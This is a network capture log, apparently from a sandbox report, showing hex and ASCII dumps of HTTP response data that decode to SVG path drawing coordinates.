                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10249INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10265INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10281INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                                          Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12252INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12268INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12284INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12300INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12316INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                          Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12332INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12348INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12364INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13628INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                          Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13644INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13660INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13676INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13692INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                                          Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13708INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
